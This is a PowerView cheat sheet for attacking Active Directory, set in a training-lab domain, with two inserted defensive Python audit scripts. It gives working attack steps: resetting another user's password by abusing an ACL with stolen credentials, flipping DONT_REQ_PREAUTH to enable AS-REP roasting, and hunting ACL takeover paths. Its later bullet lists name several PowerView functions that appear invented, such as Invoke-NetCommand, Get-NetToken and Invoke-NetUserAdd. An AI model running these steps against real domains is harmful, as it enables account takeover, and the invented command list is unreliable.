# PowerView

* <https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1>

| Command                         | Description                                                                                |
| ------------------------------- | ------------------------------------------------------------------------------------------ |
| Export-PowerViewCSV             | Append results to a CSV file                                                               |
| ConvertTo-SID                   | Convert a user or group name to its SID value                                              |
| Get-DomainSPNTicket             | Requests the Kerberos ticket for a specified Service Principal Name (SPN) account          |
| **Domain/LDAP Functions:**      |                                                                                            |
| Get-Domain                      | Will return the AD object for the current (or specified) domain                            |
| Get-DomainController            | Return a list of the Domain Controllers for the specified domain                           |
| Get-DomainUser                  | Will return all users or specific user objects in AD                                       |
| Get-DomainComputer              | Will return all computers or specific computer objects in AD                               |
| Get-DomainGroup                 | Will return all groups or specific group objects in AD                                     |
| Get-DomainOU                    | Search for all or specific OU objects in AD                                                |
| Find-InterestingDomainAcl       | Finds object ACLs in the domain with modification rights set to non-built-in objects       |
| Get-DomainGroupMember           | Will return the members of a specific domain group                                         |
| Get-DomainFileServer            | Returns a list of servers likely functioning as file servers                               |
| Get-DomainDFSShare              | Returns a list of all distributed file systems for the current (or specified) domain       |
| **GPO Functions:**              |                                                                                            |
| Get-DomainGPO                   | Will return all GPOs or specific GPO objects in AD                                         |
| Get-DomainPolicy                | Returns the default domain policy or the domain controller policy for the current domain   |
| **Computer Enumeration Functions:** |                                                                                        |
| Get-NetLocalGroup               | Enumerates local groups on the local or a remote machine                                   |
| Get-NetLocalGroupMember         | Enumerates members of a specific local group                                               |
| Get-NetShare                    | Returns open shares on the local (or a remote) machine                                     |
| Get-NetSession                  | Will return session information for the local (or a remote) machine                        |
| Test-AdminAccess                | Tests if the current user has administrative access to the local (or a remote) machine     |
| **Threaded 'Meta'-Functions:**  |                                                                                            |
| Find-DomainUserLocation         | Finds machines where specific users are logged in                                          |
| Find-DomainShare                | Finds reachable shares on domain machines                                                  |
| Find-InterestingDomainShareFile | Searches for files matching specific criteria on readable shares in the domain             |
| Find-LocalAdminAccess           | Find machines on the local domain where the current user has local administrator access    |
| **Domain Trust Functions:**     |                                                                                            |
| Get-DomainTrust                 | Returns domain trusts for the current domain or a specified domain                         |
| Get-ForestTrust                 | Returns all forest trusts for the current forest or a specified forest                     |
| Get-DomainForeignUser           | Enumerates users who are in groups outside of the user's domain                            |
| Get-DomainForeignGroupMember    | Enumerates groups with users outside of the group's domain and returns each foreign member |
| Get-DomainTrustMapping          | Will enumerate all trusts for the current domain and any others seen                       |

[PowerView/SharpView](https://book.hacktricks.xyz/windows-hardening/basic-powershell-for-pentesters/powerview)

**Creating a List of Domain Users**

```powershell
PS> Get-ADUser -Filter * | Select-Object -ExpandProperty SamAccountName > ad_users.txt
```

**Find Interesting ACL**

```powershell
Find-InterestingDomainAcl
```

**Convert-NameToSid**

```powershell
PS C:\htb> $sid = Convert-NameToSid wley
```

**Using Get-DomainObjectACL**

```powershell
Get-DomainObjectACL -Identity * | ? {$_.SecurityIdentifier -eq $sid}
```

**Get ActiveDirectoryRights**

Interesting permissions:

* **GenericAll** - full rights to the object (add users to a group or reset a user's password)
* **GenericWrite** - update the object's attributes (e.g. the logon script)
* **WriteOwner** - change the object's owner to an attacker-controlled user and take over the object
* **WriteDACL** - modify the object's ACEs and grant the attacker full control over the object
* **AllExtendedRights** - ability to add a user to a group or reset a password
* **ForceChangePassword** - ability to change a user's password
* **Self (Self-Membership)** - ability to add yourself to a group

```powershell
Get-ObjectAcl -SamAccountName <samaccountname> -ResolveGUIDs

Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }
```
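As an added example that is not part of this page or of PowerView, the Python script below applies the same classification as the `-match ("WriteDacl|GenericWrite|GenericAll")` filter and `Find-InterestingDomainAcl` to a handful of constructed ACE records laid out like the fields `Get-ObjectAcl -ResolveGUIDs` returns (ObjectDN, ActiveDirectoryRights, ObjectAceType, SecurityIdentifier, AceType). It goes a little beyond the one-liner: ExtendedRight and WriteProperty are only reported when their ObjectAceType GUID makes them dangerous, Deny ACEs are ignored, and trustees with a RID below 1000 are dropped as built-in, which is the rule Find-InterestingDomainAcl uses. The domain SID, DNs and RIDs are made up for the example; the two schema GUIDs are the real well-known ones for User-Force-Change-Password and the `member` attribute (Self-Membership).

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Real, well-known schema GUIDs that PowerView's -ResolveGUIDs turns into names.
# The all-zero GUID means the ACE is not scoped to one property or right, so
# ExtendedRight with it is what the list above calls "AllExtendedRights".
ZERO_GUID = "00000000-0000-0000-0000-000000000000"
GUID_NAMES = {
    ZERO_GUID: "All",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
    "bf9679c0-0de6-11d0-a285-00aa003049e2": "Self-Membership",  # the 'member' attribute
}

# Rights that hand over the object no matter which property the ACE names.
ALWAYS_DANGEROUS = ("GenericAll", "WriteDacl", "WriteOwner", "GenericWrite")

# Find-InterestingDomainAcl keeps domain SIDs whose RID is 1000 or higher,
# i.e. principals created after the domain was built, not the built-in ones.
DOMAIN_SID_RE = re.compile(r"^S-1-5-21-\d+-\d+-\d+-(\d+)$")


@dataclass
class Ace:
    """One ACE, using the field names PowerView's Get-ObjectAcl output uses."""
    object_dn: str            # ObjectDN: the object the ACE is on
    rights: str               # ActiveDirectoryRights, e.g. "WriteProperty, ExtendedRight"
    object_ace_type: str      # ObjectAceType GUID (all zeros when not object-scoped)
    security_identifier: str  # SecurityIdentifier of the trustee
    ace_type: str = "AccessAllowed"  # AceType; Deny ACEs grant nothing


def is_non_builtin(sid: str) -> bool:
    m = DOMAIN_SID_RE.match(sid)
    return bool(m) and int(m.group(1)) >= 1000


def resolve_guid(guid: str) -> str:
    return GUID_NAMES.get(guid.lower(), guid)


def dangerous_right(ace: Ace) -> Optional[str]:
    """Name the takeover right this ACE grants, or None if it is benign."""
    if ace.ace_type != "AccessAllowed":
        return None
    rights = {r.strip() for r in ace.rights.split(",")}
    for name in ALWAYS_DANGEROUS:
        if name in rights:
            return name
    scope = resolve_guid(ace.object_ace_type)
    if "ExtendedRight" in rights:
        if scope == "All":
            return "AllExtendedRights"
        if scope == "User-Force-Change-Password":
            return "ForceChangePassword"
    if "Self" in rights and scope in ("All", "Self-Membership"):
        return "Self-Membership"
    if "WriteProperty" in rights and scope in ("All", "Self-Membership"):
        return f"WriteProperty:{scope}"
    return None


def aces_for_sid(aces: List[Ace], sid: str) -> List[Ace]:
    """Python form of  ? {$_.SecurityIdentifier -eq $sid}"""
    return [a for a in aces if a.security_identifier.lower() == sid.lower()]


def find_interesting_aces(aces: List[Ace]) -> List[Tuple[str, str, str]]:
    """Python form of Find-InterestingDomainAcl: (object, trustee SID, right)."""
    out = []
    for ace in aces:
        right = dangerous_right(ace)
        if right and is_non_builtin(ace.security_identifier):
            out.append((ace.object_dn, ace.security_identifier, right))
    return out


# Constructed sample: the domain SID, DNs and RIDs are made up for this example.
DOMAIN_SID = "S-1-5-21-1111111111-2222222222-3333333333"
SVC = "CN=svc_backup,OU=Service Accounts,DC=example,DC=local"
GRP = "CN=Server Admins,OU=Groups,DC=example,DC=local"
OU = "OU=Workstations,DC=example,DC=local"
SAMPLE_ACES = [
    Ace(SVC, "GenericAll", ZERO_GUID, f"{DOMAIN_SID}-512"),        # Domain Admins: expected, built-in
    Ace(SVC, "ExtendedRight", "00299570-246d-11d0-a768-00aa006e0529", f"{DOMAIN_SID}-1105"),
    Ace(GRP, "WriteProperty", "bf9679c0-0de6-11d0-a285-00aa003049e2", f"{DOMAIN_SID}-1105"),
    Ace(SVC, "ReadProperty, ListChildren", ZERO_GUID, "S-1-1-0"),  # Everyone, read only
    Ace(SVC, "GenericAll", ZERO_GUID, f"{DOMAIN_SID}-1200", ace_type="AccessDenied"),
    Ace(OU, "WriteDacl", ZERO_GUID, f"{DOMAIN_SID}-1300"),
]

if __name__ == "__main__":
    for obj, sid, right in find_interesting_aces(SAMPLE_ACES):
        print(f"{sid}  {right:<30} {obj}")
```

Run as-is it prints the three ACEs worth reviewing (a RID-1105 user who can reset `svc_backup`'s password and add members to Server Admins, and a RID-1300 user with WriteDacl on an OU). Applied to a full `Get-DomainObjectACL -ResolveGUIDs -Identity *` export, the same check gives the list of non-admin principals that could take over which objects, which is the list an administrator should trim.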

**Resolving GUID**

```powershell
Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}
```

**Change Password `Force-Change-Password`**

```powershell
PS C:\htb> $SecPassword = ConvertTo-SecureString '<PASSWORD HERE>' -AsPlainText -Force
PS C:\htb> $Cred = New-Object System.Management.Automation.PSCredential('INLANEFREIGHT\wley', $SecPassword)

PS C:\htb> $damundsenPassword = ConvertTo-SecureString 'Pwn3d_by_ACLs!' -AsPlainText -Force
PS C:\htb> cd C:\Tools\
PS C:\htb> Import-Module .\PowerView.ps1
PS C:\htb> Set-DomainUserPassword -Identity damundsen -AccountPassword $damundsenPassword -Credential $Cred -Verbose

VERBOSE: [Get-PrincipalContext] Using alternate credentials
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'damundsen'
VERBOSE: [Set-DomainUserPassword] Password for user 'damundsen' successfully reset
```

**Get Group Members**

```powershell
PS C:\Tools> Get-NetLocalGroupMember -GroupName "Remote Management Users"

ComputerName : ACADEMY-EA-MS01
GroupName    : Remote Management Users
MemberName   : INLANEFREIGHT\forend
SID          : S-1-5-21-3842939050-3880317879-2865463114-5614
IsGroup      : False
IsDomain     : UNKNOWN

PS C:\Tools> Get-DomainGroupMember -Identity "Remote Management Users" -Recurse

GroupDomain             : INLANEFREIGHT.LOCAL
GroupName               : Remote Management Users
GroupDistinguishedName  : CN=Remote Management Users,CN=Builtin,DC=INLANEFREIGHT,DC=LOCAL
MemberDomain            : INLANEFREIGHT.LOCAL
MemberName              : bdavis
MemberDistinguishedName : CN=Brian Davis,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL
MemberObjectClass       : user
MemberSID               : S-1-5-21-3842939050-3880317879-2865463114-1162
```

***

**AS-REP Roasting**

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainUser -UACFilter DONT_REQ_PREAUTH
...
```

***

**Set DONT\_REQ\_PREAUTH with PowerView**

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Set-DomainObject -Identity userName -XOR @{useraccountcontrol=4194304} -Verbose

VERBOSE: [Get-DomainSearcher] search base: LDAP://DC01.INLANEFREIGHT.LOCAL/DC=INLANEFREIGHT,DC=LOCAL
VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=userName)(name=userName)(displayname=userName))))
VERBOSE: [Set-DomainObject] XORing 'useraccountcontrol' with '4194304' for object 'userName'
```
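Added example, not code from this page or from PowerView: the 4194304 passed to `-XOR` is 0x400000, the DONT_REQ_PREAUTH bit of userAccountControl, and `-XOR` toggles the bit rather than setting it. The Python below decodes a userAccountControl value into flag names, shows the toggle, diffs an old and a new value the way one reads the Old UAC Value / New UAC Value fields of a 4738 "user account was changed" event, and filters a constructed account list the way `Get-DomainUser -UACFilter DONT_REQ_PREAUTH` does (the same function answers the TRUSTED_FOR_DELEGATION / TRUSTED_TO_AUTH_FOR_DELEGATION questions in the Kerberos Delegation section further down). The flag values are the documented ADS_USER_FLAG_ENUM bits; the account names and values are constructed.

```python
from typing import Dict, List, Sequence, Tuple

# userAccountControl bits (ADS_USER_FLAG_ENUM values); PowerView's -UACFilter
# takes these names. The 4194304 on the page is 0x400000, DONT_REQ_PREAUTH.
UAC_FLAGS: Dict[int, str] = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT",
    0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x100000: "NOT_DELEGATED",
    0x200000: "USE_DES_KEY_ONLY",
    0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
FLAG_VALUES = {name: bit for bit, name in UAC_FLAGS.items()}


def decode_uac(value: int) -> List[str]:
    """Flag names set in a userAccountControl value, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def xor_uac(value: int, mask: int) -> int:
    """What Set-DomainObject -XOR does: toggle the bits in mask. Applying it
    to an account that already has the bit set clears the bit again."""
    return value ^ mask


def uac_diff(old: int, new: int) -> Tuple[List[str], List[str]]:
    """Flags set and flags cleared between two values, which is how a
    reviewer reads Old UAC Value / New UAC Value in a 4738 event."""
    ordered = sorted(UAC_FLAGS.items())
    set_flags = [n for b, n in ordered if new & b and not old & b]
    cleared = [n for b, n in ordered if old & b and not new & b]
    return set_flags, cleared


def accounts_with_flag(accounts: Sequence[Tuple[str, int]], flag: str,
                       include_disabled: bool = False) -> List[str]:
    """Python form of Get-DomainUser -UACFilter <flag> over (sam, uac) pairs.
    Disabled accounts are skipped by default since they cannot be used."""
    bit = FLAG_VALUES[flag]
    out = []
    for sam, uac in accounts:
        if not uac & bit:
            continue
        if not include_disabled and uac & FLAG_VALUES["ACCOUNTDISABLE"]:
            continue
        out.append(sam)
    return out


# Constructed sample accounts: (sAMAccountName, userAccountControl)
SAMPLE_ACCOUNTS = [
    ("svc_legacy", 0x200 | 0x10000 | 0x400000),  # pre-auth disabled: AS-REP roastable
    ("jdoe", 0x200),                              # ordinary enabled user
    ("old_vendor", 0x200 | 0x2 | 0x400000),      # same bit, but the account is disabled
    ("WEB01$", 0x1000 | 0x80000),                 # computer with unconstrained delegation
]

if __name__ == "__main__":
    before = 0x200
    after = xor_uac(before, 4194304)
    print(f"{before:#x} -> {after:#x}: set={uac_diff(before, after)[0]}")
    print("DONT_REQ_PREAUTH:", accounts_with_flag(SAMPLE_ACCOUNTS, "DONT_REQ_PREAUTH"))
    print("TRUSTED_FOR_DELEGATION:", accounts_with_flag(SAMPLE_ACCOUNTS, "TRUSTED_FOR_DELEGATION"))
```

Because `-XOR` is a toggle, the VERBOSE line on the page does not by itself say whether pre-authentication ended up disabled or re-enabled; the diff of the old and new values does, and a 4738 event whose only set flag is DONT_REQ_PREAUTH on an account that is not a known exception is the thing to alert on.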

***

**Active Directory Information**

* `Get-NetDomain`: Gets information about the current domain.
* `Get-NetForest`: Gets information about the current forest.
* `Get-NetDomainController`: Gets the domain controllers in the current domain.
* `Get-NetGroup`: Gets information about Active Directory groups.
* `Get-NetUser`: Gets information about Active Directory users.
* `Get-NetComputer`: Gets information about Active Directory computers.
* `Get-NetOU`: Gets information about Active Directory organizational units.

**Enumeration**

* `Get-NetGroupMember`: Gets the members of a group.
* `Get-NetLocalGroup`: Gets the local groups on a remote computer.
* `Get-NetLocalGroupMember`: Gets the members of a local group on a remote computer.
* `Get-NetShare`: Gets the network shares on a remote computer.
* `Get-NetLoggedon`: Gets the users currently logged on to a remote computer.

**Exploring Privileges**

* `Find-LocalAdminAccess`: Finds user accounts that have local administrator access on remote computers.
* `Find-DomainUserLocation`: Finds the computers a user has access to.
* `Find-InterestingDomainShareFile`: Finds interesting shared files within Active Directory.

**Exploring Trust Relationships**

* `Get-NetDomainTrust`: Gets the trust relationships between domains.
* `Get-NetForestTrust`: Gets the trust relationships between forests.

**Remote Execution**

* `Invoke-NetCommand`: Runs a command remotely on one or more computers.

**Permission Enumeration**

* `Get-NetFilePermissions`: Gets file permissions on a remote computer.
* `Get-NetSharePermissions`: Gets network share permissions on a remote computer.
* `Get-NetLocalGroupMapping`: Gets the local group mapping on a remote computer.
* `Get-NetEffectivePermission`: Gets the effective permissions of a user or group on a resource.

**Service Enumeration**

* `Get-NetService`: Gets information about the services running on a remote computer.
* `Get-NetLoggedon`: Gets the users currently logged on to a remote computer.

**Token Enumeration**

* `Get-NetToken`: Gets information about user and system tokens on a remote computer.

**Session Enumeration**

* `Get-NetSession`: Gets the network sessions on a remote computer.
* `Get-NetLoggedon`: Gets the users currently logged on to a remote computer.

**SID History Management**

* `Invoke-NetUserAdd`: Adds a SID to a user account.
* `Invoke-NetUserClone`: Clones a user account, including its SID History attributes.

**Domain Management**

* `Add-NetGroupMember`: Adds a member to an Active Directory group.
* `Add-NetGroupUser`: Adds a user to an Active Directory group.
* `Add-NetLocalGroupMember`: Adds a member to a local group on a remote computer.

***

### Kerberos Delegation

**User Unconstrained Delegation**

```powershell
Get-NetUser | Where-Object { $_.TrustedForDelegation }
```

**Constrained Delegation**

```powershell
Get-DomainComputer -TrustedToAuth
```

**FindUser With ActiveDirectoryRights (WriteDacl|GenericWrite|GenericAll)**

```powershell
Get-ObjectAcl -SamAccountName carole.holmes -ResolveGuids | ? {$_.ActiveDirectoryRights -match ("WriteDacl|GenericWrite|GenericAll") }
```

**Retrieving Domain SID**

```powershell
PS C:\Tools> Import-Module .\PowerView.ps1
PS C:\Tools> Get-DomainSID

S-1-5-21-2974783224-3764228556-2640795941
```

***

**General Tips**

<https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993>
